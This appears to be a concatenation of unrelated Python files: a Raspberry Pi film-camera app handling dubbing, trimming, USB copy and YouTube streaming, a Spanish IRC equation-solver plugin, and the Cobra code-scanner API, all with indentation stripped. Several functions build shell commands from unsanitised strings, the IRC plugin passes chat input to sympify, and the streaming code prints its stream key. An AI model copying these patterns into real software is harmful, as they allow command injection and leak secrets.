if dubmix[dubselected][1] >= 0.99 and dubmix[dubselected][0] > 0.01:
dubmix[dubselected][0] -= 0.1
if dubmix[dubselected][0] >= 0.99 and dubmix[dubselected][1] < 0.99:
dubmix[dubselected][1] += 0.1
elif pressed == 'up' and selected == 6:
dubmix[dubselected][2] += 0.1
elif pressed == 'down' and selected == 6:
if dubmix[dubselected][2] > 0.01:
dubmix[dubselected][2] -= 0.1
elif pressed == 'up' and selected == 7:
dubmix[dubselected][3] += 0.1
elif pressed == 'down' and selected == 7:
if dubmix[dubselected][3] > 0.01:
dubmix[dubselected][3] -= 0.1
elif pressed == 'right':
if selected < (len(settings) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'middle' and menu[selected] == 'BACK':
os.system('pkill aplay')
break
elif pressed == 'view': # mix dub and listen
run_command('pkill aplay')
dubfiles, dubmix, rerender = getdubs(filmfolder, filmname, scene)
if scene:
filename = filmfolder + filmname + '/scene' + str(scene).zfill(3) +'/scene'
else:
filename = filmfolder + filmname + '/' + filmname
renderfilename = renderfilm(filmfolder, filmname, 0, 0, False)
playdub(renderfilename, 'film')
time.sleep(0.05)
#Save dubmix before returning
if dubmix != dubmix_old:
if os.path.isdir(filefolder) == False:
os.makedirs(filefolder)
c = 1
for i in dubmix:
with open(filefolder + ".settings" + str(c).zfill(3), "w") as f:
for p in i:
f.write(str(round(p,1)) + '\n')
print(str(round(p,1)))
c += 1
dubmix_old = dubmix
return dubrecord
#---------------Play & DUB--------------------
def playdub(filename, player_menu):
global headphoneslevel, miclevel, plughw, channels
#omxplayer hack
os.system('rm /tmp/omxplayer*')
video = True
if player_menu == 'dub':
dub = True
else:
dub = False
if not os.path.isfile(filename + '.mp4'):
#should probably check if its not a corrupted video file
logger.info("no file to play")
if dub == True:
video = False
else:
return
t = 0
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
playing = False
pause = False
trim = False
videolag = 0
if video == True:
try:
player = OMXPlayer(filename + '.mp4', args=['--fps', '25', '--layer', '3', '--win', '0,70,800,410', '--no-osd', '--no-keys'], dbus_name='org.mpris.MediaPlayer2.omxplayer1', pause=True)
except:
writemessage('Something wrong with omxplayer')
time.sleep(2)
return
writemessage('Starting omxplayer')
clipduration = player.duration()
#sound
try:
playerAudio = OMXPlayer(filename + '.wav', args=['--adev','alsa:hw:'+str(plughw)], dbus_name='org.mpris.MediaPlayer2.omxplayer2', pause=True)
time.sleep(0.5)
except:
writemessage('something wrong with audio player')
time.sleep(2)
return
#omxplayer hack to play really short videos.
if clipduration < 4:
logger.info("clip duration shorter than 4 sec")
player.previous()
try:
if dub == True:
p = 0
while p < 3:
writemessage('Dubbing in ' + str(3 - p) + 's')
time.sleep(1)
p+=1
if video == True:
player.play()
#run_command('aplay -D plughw:0 ' + filename + '.wav &')
#run_command('mplayer ' + filename + '.wav &')
playerAudio.play()
if player_menu == 'dub':
run_command(tarinafolder + '/alsa-utils-1.1.3/aplay/arecord -D plughw:'+str(plughw)+' -f S16_LE -c '+str(channels)+' -r44100 -vv /dev/shm/dub.wav &')
except:
logger.info('something wrong with omxplayer')
#logger.warning(e)
return
starttime = time.time()
selected = 1
while True:
if trim == True:
menu = 'CANCEL', 'FROM BEGINNING', 'FROM END'
settings = '','',''
elif pause == True:
if player_menu == 'shot':
menu = 'BACK', 'PLAY', 'REPLAY', 'TRIM'
settings = '','','',''
else:
menu = 'BACK', 'PLAY', 'REPLAY'
settings = '','',''
elif player_menu == 'dub':
menu = 'BACK', 'REDUB', 'PHONES:', 'MIC:'
settings = '', '', str(headphoneslevel), str(miclevel)
else:
menu = 'BACK', 'PAUSE', 'REPLAY', 'PHONES:'
settings = '', '', '', str(headphoneslevel)
if dub == True:
header = 'Dubbing ' + str(round(t,1))
else:
header = 'Playing ' + str(round(t,1)) + ' of ' + str(clipduration) + ' s'
writemenu(menu,settings,selected,header)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if buttonpressed == True:
flushbutton()
if pressed == 'right':
if selected < (len(settings) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'up':
if menu[selected] == 'PHONES:':
if headphoneslevel < 100:
headphoneslevel = headphoneslevel + 2
run_command('amixer -c 0 sset Speaker ' + str(headphoneslevel) + '%')
elif menu[selected] == 'MIC:':
if miclevel < 100:
miclevel = miclevel + 2
run_command('amixer -c 0 sset Mic ' + str(miclevel) + '% unmute')
else:
try:
player.set_position(t+2)
playerAudio.set_position(player.position())
except:
return
elif pressed == 'down':
if menu[selected] == 'PHONES:':
if headphoneslevel > 0:
headphoneslevel = headphoneslevel - 2
run_command('amixer -c 0 sset Speaker ' + str(headphoneslevel) + '%')
elif menu[selected] == 'MIC:':
if miclevel > 0:
miclevel = miclevel - 2
run_command('amixer -c 0 sset Mic ' + str(miclevel) + '% unmute')
else:
if t > 1:
try:
player.set_position(t-2)
playerAudio.set_position(player.position())
except:
return
elif pressed == 'middle':
time.sleep(0.2)
if menu[selected] == 'BACK' or player.playback_status() == "Stopped":
try:
if video == True:
try:
player.stop()
playerAudio.stop()
player.quit()
playerAudio.quit()
except:
return
os.system('pkill aplay')
except:
#kill it if it dont stop
os.system('pkill dbus-daemon')
os.system('pkill omxplayer')
if dub == True:
os.system('pkill arecord')
time.sleep(0.2)
return
elif menu[selected] == 'REPLAY' or menu[selected] == 'REDUB':
pause = False
try:
os.system('pkill aplay')
if dub == True:
os.system('pkill arecord')
if video == True:
try:
player.pause()
playerAudio.pause()
player.set_position(0)
playerAudio.set_position(0)
except:
return
if dub == True:
p = 0
while p < 3:
writemessage('Dubbing in ' + str(3 - p) + 's')
time.sleep(1)
p+=1
try:
player.play()
playerAudio.play()
except:
return
#run_command('aplay -D plughw:0 ' + filename + '.wav &')
if dub == True:
run_command(tarinafolder + '/alsa-utils-1.1.3/aplay/arecord -D plughw:'+str(plughw)+' -f S16_LE -c '+str(channels)+' -r44100 -vv /dev/shm/dub.wav &')
except:
pass
starttime = time.time()
elif menu[selected] == 'PAUSE':
try:
player.pause()
playerAudio.pause()
pause = True
except:
pass
elif menu[selected] == 'PLAY':
try:
player.play()
playerAudio.play()
except:
return
pause = False
elif menu[selected] == 'TRIM':
selected = 1
trim = True
elif menu[selected] == 'CANCEL':
selected = 1
trim = False
elif menu[selected] == 'FROM BEGINNING':
trim = ['beginning', player.position()]
player.quit()
playerAudio.quit()
return trim
elif menu[selected] == 'FROM END':
trim = ['end', player.position()]
player.quit()
playerAudio.quit()
return trim
time.sleep(0.02)
if pause == False:
try:
t = player.position()
except:
os.system('pkill aplay')
if dub == True:
os.system('pkill arecord')
break
player.quit()
playerAudio.quit()
#os.system('pkill dbus-daemon')
#---------------View Film--------------------
def viewfilm(filmfolder, filmname):
scenes, shots, takes = countlast(filmname, filmfolder)
scene = 1
filmfiles = []
while scene <= scenes:
shots = countshots(filmname, filmfolder, scene)
if shots > 0:
filmfiles.extend(shotfiles(filmfolder, filmname, scene))
scene = scene + 1
return filmfiles
#---------------Video Trim--------------------
def videotrim(filename, trim_filename, where, s):
#theres two different ways of non-rerendering mp4 cut techniques that i know MP4Box and ffmpeg
if where == 'beginning':
logger.info('trimming clip from beginning')
#run_command('ffmpeg -ss ' + str(s) + ' -i ' + filename + '.mp4 -c copy ' + trim_filename + '.mp4')
run_command('MP4Box ' + filename + '.mp4 -splitx ' + str(s) + ':end -out ' + trim_filename + '.mp4')
run_command('cp ' + filename + '.wav ' + trim_filename + '.wav')
audiotrim(trim_filename, 'beginning')
if where == 'end':
logger.info('trimming clip from end')
#run_command('ffmpeg -to ' + str(s) + ' -i ' + filename + '.mp4 -c copy ' + trim_filename + '.mp4')
run_command('MP4Box ' + filename + '.mp4 -splitx 0:' + str(s) + ' -out ' + trim_filename + '.mp4')
run_command('cp ' + filename + '.wav ' + trim_filename + '.wav')
audiotrim(trim_filename, 'end')
#take last frame
run_command('ffmpeg -sseof -1 -i ' + trim_filename + '.mp4 -update 1 -q:v 1 -vf scale=800:340 ' + trim_filename + '.jpeg')
return
#--------------Get Audio cards--------------
def getaudiocards():
with open("/proc/asound/cards") as fp:
cards = fp.readlines()
audiocards = []
for i in cards:
if i[1] in ['0','1','2','3']:
print('audio card 0: ' + i[22:].rstrip('\n'))
audiocards.append(i[22:].rstrip('\n'))
return audiocards
#--------------Audio Trim--------------------
# make audio file same lenght as video file
def audiotrim(filename, where):
writemessage('Audio syncing..')
pipe = subprocess.check_output('mediainfo --Inform="Video;%Duration%" ' + filename + '.mp4', shell=True)
videolenght = pipe.decode().strip()
pipe = subprocess.check_output('mediainfo --Inform="Audio;%Duration%" ' + filename + '.wav', shell=True)
audiolenght = pipe.decode().strip()
#if there is no audio lenght
logger.info('audio is:' + audiolenght)
if not audiolenght.strip():
audiolenght = 0
#separate seconds and milliseconds
#videoms = int(videolenght) % 1000
#audioms = int(audiolenght) % 1000
#videos = int(videolenght) / 1000
#audios = int(audiolenght) / 1000
if int(audiolenght) > int(videolenght):
#calculate difference
audiosync = int(audiolenght) - int(videolenght)
newaudiolenght = int(audiolenght) - audiosync
logger.info('Audiofile is: ' + str(audiosync) + 'ms longer')
#trim from end or beginning and put a 0.01 in- and outfade
if where == 'end':
run_command('sox -V0 ' + filename + '.wav ' + filename + '_temp.wav trim 0 -' + str(int(audiosync)/1000))
if where == 'beginning':
run_command('sox -V0 ' + filename + '.wav ' + filename + '_temp.wav trim ' + str(int(audiosync)/1000))
run_command('sox -V0 -G ' + filename + '_temp.wav ' + filename + '.wav fade 0.01 0 0.01')
os.remove(filename + '_temp.wav')
#if int(audiosync) > 400:
# writemessage('WARNING!!! VIDEO FRAMES DROPPED!')
# vumetermessage('Consider changing to a faster microsd card.')
# time.sleep(10)
delayerr = 'A' + str(audiosync)
else:
audiosync = int(videolenght) - int(audiolenght)
#calculate difference
#audiosyncs = videos - audios
#audiosyncms = videoms - audioms
#if audiosyncms < 0:
# if audiosyncs > 0:
# audiosyncs = audiosyncs - 1
# audiosyncms = 1000 + audiosyncms
logger.info('Videofile is: ' + str(audiosync) + 'ms longer')
#make fade
run_command('sox -V0 -G ' + filename + '.wav ' + filename + '_temp.wav fade 0.01 0 0.01')
#make delay file
run_command('sox -V0 -n -r 44100 -c 1 /dev/shm/silence.wav trim 0.0 ' + str(int(audiosync)/1000))
#add silence to end
run_command('sox -V0 /dev/shm/silence.wav ' + filename + '_temp.wav ' + filename + '.wav')
os.remove(filename + '_temp.wav')
os.remove('/dev/shm/silence.wav')
delayerr = 'V' + str(audiosync)
#os.remove('/dev/shm/' + filename + '.wav')
return delayerr
#os.system('mv audiosynced.wav ' + filename + '.wav')
#os.system('rm silence.wav')
#--------------Audiosilence--------------------
# make an empty audio file as long as a video file
def audiosilence(foldername,filename):
writemessage('Creating audiosilence..')
pipe = subprocess.check_output('mediainfo --Inform="Video;%Duration%" ' + foldername + filename + '.mp4', shell=True)
videolenght = pipe.decode()
logger.info('Video lenght is ' + videolenght)
#separate seconds and milliseconds
videoms = int(videolenght) % 1000
videos = int(videolenght) / 1000
logger.info('Videofile is: ' + str(videos) + 's ' + str(videoms))
run_command('sox -V0 -n -r 44100 -c 1 /dev/shm/silence.wav trim 0.0 ' + str(videos))
os.system('cp /dev/shm/silence.wav ' + foldername + filename + '.wav')
os.system('rm /dev/shm/silence.wav')
#--------------Copy to USB-------------------
def copytousb(filmfolder):
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
writemessage('Searching for usb storage device, middlebutton to cancel')
films = getfilms(filmfolder)
while True:
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
usbconnected = os.path.ismount('/media/usb0')
if pressed == 'middle':
writemessage('canceling..')
time.sleep(2)
break
time.sleep(0.02)
if usbconnected == True:
#Copy new files to usb device
try:
os.makedirs('/media/usb0/tarinafilms/')
except:
pass
try:
p = subprocess.check_output('stat -f -c %T /media/usb0', shell=True)
filesystem = p.decode()
print('filesystem info: ' + filesystem)
except:
writemessage('Oh-no! dont know your filesystem')
waitforanykey()
return
for filmname in films:
#check filmhash
filmname = filmname[0]
usbpath = '/media/usb0/tarinafilms/'+filmname
usbfilmhash = ''
filmhash = ''
while True:
if os.path.exists(usbpath) == False:
break
try:
with open(filmfolder + filmname + '/.filmhash', 'r') as f:
filmhash = f.readline().strip()
print('filmhash is: ' + filmhash)
except:
print('no filmhash found!')
try:
with open(usbpath + '/.filmhash', 'r') as f:
usbfilmhash = f.readline().strip()
print('usbfilmhash is: ' + usbfilmhash)
except:
print('no usbfilmhash found!')
if usbfilmhash == filmhash:
print('same moviefilm found, updating clips...')
break
else:
writemessage('Found a subsequent moviefilm...')
print('same film exist with different filmhashes, copying to subsequent film folder')
time.sleep(2)
usbpath += '_new'
try:
os.makedirs(usbpath)
writemessage('Copying film ' + filmname + '...')
except:
writemessage('Found existing ' + filmname + ', copying new files... ')
try:
run_command('rsync -avr -P ' + filmfolder + filmname + '/ ' + usbpath)
except:
writemessage('couldnt copy film ' + filmname)
waitforanykey()
return
run_command('sync')
run_command('pumount /media/usb0')
writemessage('all files copied successfully!')
waitforanykey()
writemessage('You can safely unplug the usb device now')
time.sleep(2)
return
#-----------Check for the webz---------
def webz_on():
try:
# connect to the host -- tells us if the host is actually
# reachable
socket.create_connection(("google.com", 80))
return True
except OSError:
pass
writemessage('No internet connection!')
time.sleep(2)
return False
#-------------Upload film------------
def uploadfilm(filename, filmname):
pressed = ''
buttonpressed = ''
buttontime = time.time()
holdbutton = ''
mods = ['Back']
settings = ['']
writemessage('Searching for upload mods')
with open(tarinafolder + '/mods/upload-mods-enabled') as m:
mods.extend(m.read().splitlines())
for m in mods:
settings.append('')
menu = mods
selected = 0
while True:
header = 'Where do you want to upload?'
writemenu(menu,settings,selected,header)
pressed, buttonpressed, buttontime, holdbutton, event, keydelay = getbutton(pressed, buttonpressed, buttontime, holdbutton)
if pressed == 'right':
if selected < (len(menu) - 1):
selected = selected + 1
elif pressed == 'left':
if selected > 0:
selected = selected - 1
elif pressed == 'middle' and menu[selected] == 'Back':
return None
elif pressed == 'middle' and menu[selected] in mods:
cmd = tarinafolder + '/mods/' + menu[selected] + '.sh ' + filmname + ' ' + filename + '.mp4'
return cmd
time.sleep(0.02)
#-------------Streaming---------------
def startstream(camera, stream, plughw, channels):
youtube="rtmp://a.rtmp.youtube.com/live2/"
with open("/home/pi/.youtube-live") as fp:
key = fp.readlines()
print('using key: ' + key[0])
stream_cmd = 'ffmpeg -f h264 -r 25 -i - -itsoffset 5.5 -fflags nobuffer -f alsa -ac '+str(channels)+' -i hw:'+str(plughw)+' -ar 44100 -vcodec copy -acodec libmp3lame -b:a 128k -ar 44100 -map 0:0 -map 1:0 -strict experimental -f flv ' + youtube + key[0]
try:
stream = subprocess.Popen(stream_cmd, shell=True, stdin=subprocess.PIPE)
camera.start_recording(stream.stdin, format='h264', bitrate = 2000000)
except:
stream = ''
#now = time.strftime("%Y-%m-%d-%H:%M:%S")
return stream
def stopstream(camera, stream):
camera.stop_recording()
os.system('pkill -9 ffmpeg')
print("Camera safely shut down")
print("Good bye")
stream = ''
return stream
#-------------Beeps-------------------
def beep():
buzzerrepetitions = 100
buzzerdelay = 0.00001
for _ in range(buzzerrepetitions):
for value in [0xC, 0x4]:
#GPIO.output(1, value)
bus.write_byte_data(DEVICE,OLATA,value)
time.sleep(buzzerdelay)
return
def longbeep():
buzzerrepetitions = 100
buzzerdelay = 0.0001
for _ in range(buzzerrepetitions * 5):
for value in [0xC, 0x4]:
#GPIO.output(1, value)
bus.write_byte_data(DEVICE,OLATA,value)
buzzerdelay = buzzerdelay - 0.00000004
time.sleep(buzzerdelay)
bus.write_byte_data(DEVICE,OLATA,0x4)
return
def buzz(buzzerlenght):
buzzerdelay = 0.0001
for _ in range(buzzerlenght):
for value in [0xC, 0x4]:
#GPIO.output(1, value)
bus.write_byte_data(DEVICE,OLATA,value)
time.sleep(buzzerdelay)
return
#---------reading in a lens shading table----------
def read_table(inFile):
# q&d-way to read in ls_table.h
ls_table = []
channel = []
with open(inFile) as file:
for line in file:
# we skip the unimportant stuff
if not ( line.startswith("uint") \
or line.startswith("}")):
# the comments separate the color planes
if line.startswith("//"):
channel = []
ls_table.append(channel)
else:
# scan in a single line
line = line.replace(',','')
lineData = [int(x) for x in line.split()]
channel.append(lineData)
return np.array(ls_table,dtype=np.uint8)
#-------------Check if file empty----------
def empty(filename):
if os.path.isfile(filename + '.mp4') == False:
return False
if os.path.isfile(filename + '.mp4') == True:
writemessage('Take already exists')
time.sleep(2)
return True
#--------------BUTTONS-------------
def waitforanykey():
vumetermessage("press any key to continue..")
time.sleep(1)
while True:
with term.cbreak():
val = term.inkey(timeout=0)
if not val:
event = ''
elif val.is_sequence:
event = val.name
elif val:
event = val
if i2cbuttons == True:
readbus = bus.read_byte_data(DEVICE,GPIOB)
readbus2 = bus.read_byte_data(DEVICE,GPIOA)
else:
readbus = 255
readbus2 = 247
if readbus != 255 or readbus2 != 247 or event != '':
time.sleep(0.05)
vumetermessage(' ')
return
def middlebutton():
with term.cbreak():
val = term.inkey(timeout=0)
if val.is_sequence:
event = val.name
#print(event)
elif val:
event = val
#print(event)
else:
event = ''
if i2cbuttons == True:
readbus = bus.read_byte_data(DEVICE,GPIOB)
readbus2 = bus.read_byte_data(DEVICE,GPIOA)
if readbus != 255:
print('i2cbutton pressed: ' + str(readbus))
if readbus2 != 247:
print('i2cbutton pressed: ' + str(readbus2))
else:
readbus = 255
readbus2 = 247
pressed = ''
if event == 'KEY_ENTER' or event == 10 or event == 13 or (readbus == 247 and readbus2 == 247):
pressed = 'middle'
return True
return False
def flushbutton():
with term.cbreak():
while True:
inp = term.inkey(timeout=0)
print('flushing ' + repr(inp))
if inp == '':
break
def getbutton(lastbutton, buttonpressed, buttontime, holdbutton):
with term.cbreak():
val = term.inkey(timeout=0)
if val.is_sequence:
event = val.name
#print(event)
elif val:
event = val
#print(event)
else:
event = ''
keydelay = 0.08
if i2cbuttons == True:
readbus = bus.read_byte_data(DEVICE,GPIOB)
readbus2 = bus.read_byte_data(DEVICE,GPIOA)
if readbus != 255:
print('i2cbutton pressed: ' + str(readbus))
if readbus2 != 247:
print('i2cbutton pressed: ' + str(readbus2))
else:
readbus = 255
readbus2 = 247
pressed = ''
if buttonpressed == False:
if event == 27:
pressed = 'quit'
elif event == 'KEY_ENTER' or event == 10 or event == 13 or (readbus == 247 and readbus2 == 247):
pressed = 'middle'
elif event == 'KEY_UP' or (readbus == 191 and readbus2 == 247):
pressed = 'up'
elif event == 'KEY_DOWN' or (readbus == 254 and readbus2 == 247):
pressed = 'down'
elif event == 'KEY_LEFT' or (readbus == 239 and readbus2 == 247):
pressed = 'left'
elif event == 'KEY_RIGHT' or (readbus == 251 and readbus2 == 247):
pressed = 'right'
elif event == 'KEY_PGUP' or event == ' ' or (readbus == 127 and readbus2 == 247):
pressed = 'record'
elif event == 'KEY_PGDOWN' or (readbus == 253 and readbus2 == 247):
pressed = 'retake'
elif event == 'KEY_TAB' or (readbus == 223 and readbus2 == 247):
pressed = 'view'
elif event == 'KEY_DELETE' or readbus2 == 246:
pressed = 'remove'
elif event == 'P' or (readbus2 == 245 and readbus == 191):
pressed = 'peak'
elif event == 'I' or (readbus2 == 244 and readbus == 255):
pressed = 'insert'
elif event == 'C' or (readbus2 == 245 and readbus == 254):
pressed = 'copy'
elif event == 'M' or (readbus2 == 245 and readbus == 253):
pressed = 'move'
#elif readbus2 == 247:
# pressed = 'shutdown'
buttontime = time.time()
holdbutton = pressed
buttonpressed = True
if readbus == 255 and event == '':
buttonpressed = False
if float(time.time() - buttontime) > 0.2 and buttonpressed == True:
if holdbutton == 'up' or holdbutton == 'down' or holdbutton == 'right' or holdbutton == 'left' or holdbutton == 'shutdown' or holdbutton == 'remove':
pressed = holdbutton
keydelay = 0.06
if time.time() - buttontime > 2 and buttonpressed == True:
keydelay = 0.02
if time.time() - buttontime > 4 and buttonpressed == True:
keydelay = 0.01
return pressed, buttonpressed, buttontime, holdbutton, event, keydelay
def startinterface():
call(['./startinterface.sh &'], shell = True)
def stopinterface(camera):
camera.stop_preview()
camera.close()
os.system('pkill arecord')
os.system('pkill startinterface')
os.system('pkill tarinagui')
run_command('sudo systemctl stop apache2')
def startcamera(lens):
camera = picamera.PiCamera()
camera.resolution = (1920, 816) #tested modes 1920x816, 1296x552/578, v2 1640x698, 1640x1232
#lensshade = ''
#npzfile = np.load('lenses/' + lens)
#lensshade = npzfile['lens_shading_table']
#camera.framerate = 24.999
camera_model, camera_revision = getconfig(camera)
# v1 = 'ov5647'
# v2 = ?
logger.info("picamera version is: " + camera_model + ' ' + camera_revision)
if camera_model == 'imx219':
table = read_table('lenses/' + lens)
camera.lens_shading_table = table
camera.framerate = 24.999
if camera_model == 'ov5647':
table = read_table('lenses/' + lens)
camera.lens_shading_table = table
# Different versions of ov5647 with different clock speeds, need to make a config file
# if there's more frames then the video will be longer when converting it to 25 fps,
# I try to get it as perfect as possible with trial and error.
# ov5647 Rev C
if camera_revision == 'rev.C':
camera.framerate = 26.03
# ov5647 Rev D"
if camera_revision == 'rev.D':
camera.framerate = 23.15
else:
camera.framerate = 24.999
camera.crop = (0, 0, 1.0, 1.0)
camera.video_stabilization = True
camera.led = False
#lens_shading_table = np.zeros(camera._lens_shading_table_shape(), dtype=np.uint8) + 32
#camera.lens_shading_table = lens_shading_table
camera.start_preview()
camera.awb_mode = 'auto'
return camera
def tarinaserver(state):
#Tarina server
if state == True:
#Try to run apache
try:
run_command('sudo systemctl start apache2')
return 'on'
except:
writemessage("could not run tarina server")
time.sleep(2)
return 'off'
if state == False:
run_command('sudo systemctl stop apache2')
return 'off'
if __name__ == '__main__':
import sys
try:
main()
except:
os.system('pkill arecord')
os.system('pkill startinterface')
os.system('pkill tarinagui')
print('Unexpected error : ', sys.exc_info()[0], sys.exc_info()[1])
|
sympy.py
|
# -*- coding: utf-8 -*-
import logging
import multiprocessing
try:
from sympy.solvers import solve
from sympy import Symbol
from sympy.core import sympify
except ImportError:
logging.error("m_sympy: Sympy no está instalado.")
class sympy:
def __init__(self, core, client):
try:
solve
except:
return
core.addCommandHandler("calcx", self, chelp="Resuelve X en una ecuación"
". Sintaxis: calcx <ecuación>")
core.addCommandHandler("calcxy", self, chelp="Resuelve X e Y en una ecu"
"ación. Sintaxis: calcxy <ecuación>")
self.q = multiprocessing.Queue()
def calcx(self, bot, cli, ev):
if len(ev.splitd) < 1:
cli.msg("Error: Faltan parametros")
expr = " ".join(ev.splitd)
expr = "(" + expr
expr = expr.replace("=", ") - (")
expr = expr + ")"
pr = sympify(expr)
x = Symbol('x')
#res = solve(pr, x)
res = self.try_slow_thing(self.calcx_, self.q, pr, x)
cli.msg(ev.target, str(res))
def calcxy(self, bot, cli, ev):
if len(ev.splitd) < 1:
cli.msg("Error: Faltan parametros")
expr = " ".join(ev.splitd)
expr = "(" + expr
expr = expr.replace("=", ") - (")
expr = expr + ")"
try:
pr = sympify(expr)
except:
cli.msg(ev.target, "Error de sintaxis o algo por el estilo.")
return 0
x = Symbol('x')
y = Symbol('y')
#res = solve(pr, x, y)
res = self.try_slow_thing(self.calcxy_, self.q, pr, x, y)
cli.msg(ev.target, str(res))
def calcxy_(self, q, pr, x, y):
res = solve(pr, x, y)
q.put(str(res))
def calcx_(self, q, pr, x):
res = solve(pr, x)
q.put(str(res))
def try_slow_thing(self, function, *args):
p = multiprocessing.Process(target=function, args=args)
p.start()
p.join(5)
if p.is_alive():
p.terminate()
return "La operación se demoro mucho"
else:
return self.q.get(True)
|
api.py
|
# -*- coding: utf-8 -*-
"""
api
~~~
Implements API Server and Interface
:author: Feei <[email protected]>
:homepage: https://github.com/wufeifei/cobra
:license: MIT, see LICENSE for more details.
:copyright: Copyright (c) 2017 Feei. All rights reserved
"""
import socket
import errno
import time
import os
import json
import multiprocessing
import threading
from flask import Flask, request, render_template
from flask_restful import Api, Resource
from . import cli
from .cli import get_sid
from .engine import Running
from .log import logger
from .config import Config, running_path
try:
# Python 3
import queue
except ImportError:
# Python 2
import Queue as queue
q = queue.Queue()
app = Flask(__name__, static_folder='templates/asset')
def producer(task):
q.put(task)
def consumer():
while True:
task = q.get()
p = multiprocessing.Process(target=cli.start, args=task)
p.start()
p.join()
q.task_done()
class AddJob(Resource):
@staticmethod
def post():
data = request.json
if not data or data == "":
return {"code": 1003, "result": "Only support json, please post json data."}
target = data.get("target")
formatter = data.get("formatter")
output = data.get("output")
rule = data.get("rule")
is_valid_key = key_verify(data=data)
if is_valid_key is not True:
return is_valid_key
if not target or target == "":
return {"code": 1002, "result": "URL cannot be empty."}
if not formatter or formatter == '':
formatter = 'json'
if not output or output == '':
output = ''
if not rule or rule == '':
rule = ''
# Report All Id
a_sid = get_sid(target, True)
if isinstance(target, list):
for t in target:
# Scan
arg = (t, formatter, output, rule, a_sid)
producer(task=arg)
result = {
"msg": "Add scan job successfully.",
"sid": a_sid,
}
else:
arg = (target, formatter, output, rule, a_sid)
producer(task=arg)
result = {
"msg": "Add scan job successfully.",
"sid": a_sid,
}
a_sid_data = {
'sids': {}
}
running = Running(a_sid)
# Write a_sid running data
running.list(a_sid_data)
# Write a_sid running status
data = {
'status': 'running',
'report': ''
}
running.status(data)
return {"code": 1001, "result": result}
class JobStatus(Resource):
@staticmethod
def post():
data = request.json
if not data or data == "":
return {"code": 1003, "result": "Only support json, please post json data."}
sid = data.get("sid")
is_valid_key = key_verify(data=data)
if is_valid_key is not True:
return is_valid_key
if not sid or sid == "":
return {"code": 1002, "result": "sid is required."}
sid = str(data.get("sid")) # 需要拼接入路径,转为字符串
running = Running(sid)
if running.is_file() is not True:
data = {
'code': 1001,
'msg': 'scan id not exist!',
'sid': sid,
'status': 'no such scan',
'report': ''
}
else:
result = running.status()
if result['status'] == 'running':
r_data = running.list()
ret = True
logger.info(r_data['sids'])
for sid, git in r_data['sids'].items():
if Running(sid).is_file(True) is False:
ret = False
if ret:
result['status'] = 'done'
running.status(result)
data = {
'code': 1001,
'msg': 'success',
'sid': sid,
'status': result['status'],
'report': result['report']
}
return data
@app.route('/', methods=['GET', 'POST'])
def summary():
a_sid = request.args.get(key='sid')
if a_sid is None:
return 'No sid specified.'
scan_status_file = os.path.join(running_path, '{sid}_status'.format(sid=a_sid))
scan_list_file = os.path.join(running_path, '{sid}_list'.format(sid=a_sid))
if not os.path.isfile(scan_status_file):
return 'No such scan.'
with open(scan_status_file, 'r') as f:
scan_status = json.load(f).get('status')
with open(scan_list_file, 'r') as f:
scan_list = json.load(f).get('sids')
if scan_status == 'running':
return 'Scan job is still running, Please check later.'
start_time = os.path.getctime(filename=scan_status_file)
start_time = time.localtime(start_time)
start_time = time.strftime('%Y-%m-%d %H:%M:%S', start_time)
total_targets_number = len(scan_list)
total_vul_number, critical_vul_number, high_vul_number , medium_vul_number, low_vul_number = 0, 0, 0, 0, 0
rule_filter = dict()
for s_sid in scan_list:
s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
with open(s_sid_file, 'r') as f:
s_sid_data = json.load(f)
total_vul_number += len(s_sid_data)
for vul in s_sid_data.get('vulnerabilities'):
if 9 <= int(vul.get('level')) <= 10:
critical_vul_number += 1
elif 6 <= int(vul.get('level')) <= 8:
high_vul_number += 1
elif 3 <= int(vul.get('level')) <= 5:
medium_vul_number += 1
elif 1 <= int(vul.get('level')) <= 2:
low_vul_number += 1
try:
rule_filter[vul.get('rule_name')] += 1
except KeyError:
rule_filter[vul.get('rule_name')] = 1
return render_template(template_name_or_list='summary.html',
total_targets_number=total_targets_number,
start_time=start_time,
scan_list=scan_list,
a_sid=a_sid,
total_vul_number=total_vul_number,
critical_vul_number=critical_vul_number,
high_vul_number=high_vul_number,
medium_vul_number=medium_vul_number,
low_vul_number=low_vul_number,
vuls=rule_filter,)
@app.route('/report/<path:a_sid>/<path:s_sid>', methods=['GET'])
def report(a_sid, s_sid):
if s_sid is None:
return 'No sid specified.'
scan_data_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
scan_list_file = os.path.join(running_path, '{sid}_list'.format(sid=a_sid))
if not os.path.isfile(scan_data_file):
return 'No such target.'
with open(scan_data_file, 'r') as f:
scan_data = json.load(f)
with open(scan_list_file, 'r') as f:
scan_list = json.load(f).get('sids')
with open(os.path.join(os.path.dirname(__file__), 'templates/asset/js/report.js')) as f:
report_js = f.read()
return render_template(template_name_or_list='result.html',
scan_data=json.dumps(scan_data, ensure_ascii=False),
report_js=report_js)
def key_verify(data):
key = Config(level1="cobra", level2="secret_key").value
_key = data.get("key")
if _key == key:
return True
elif not _key or _key == "":
return {"code": 1002, "result": "Key cannot be empty."}
elif not _key == key:
return {"code": 4002, "result": "Key verify failed."}
else:
return {"code": 4002, "result": "Unknown key verify error."}
def start(host, port, debug):
logger.info('Start {host}:{port}'.format(host=host, port=port))
api = Api(app)
api.add_resource(AddJob, '/api/add')
api.add_resource(JobStatus, '/api/status')
# 消费者线程
threads = []
for i in range(10):
threads.append(threading.Thread(target=consumer, args=()))
for i in threads:
i.setDaemon(daemonic=True)
i.start()
try:
app.run(debug=debug, host=host, port=int(port), threaded=True, processes=1)
except socket.error as v:
if v[0] == errno.EACCES:
logger.critical('must root permission for start API Server!')
exit()
else:
logger.critical('{msg}'.format(msg=v[1]))
logger.info('API Server start success')
|
_flaskserver.py
|
"""
Serve web page and handle web sockets using Flask.
"""
# Improvements to be done in the future:
# 1) Code from MainHandler, AppHandler and WSHandler should be moved in
# _serverHandlers.py. Only RequestHandler and MyWebSocketHandler
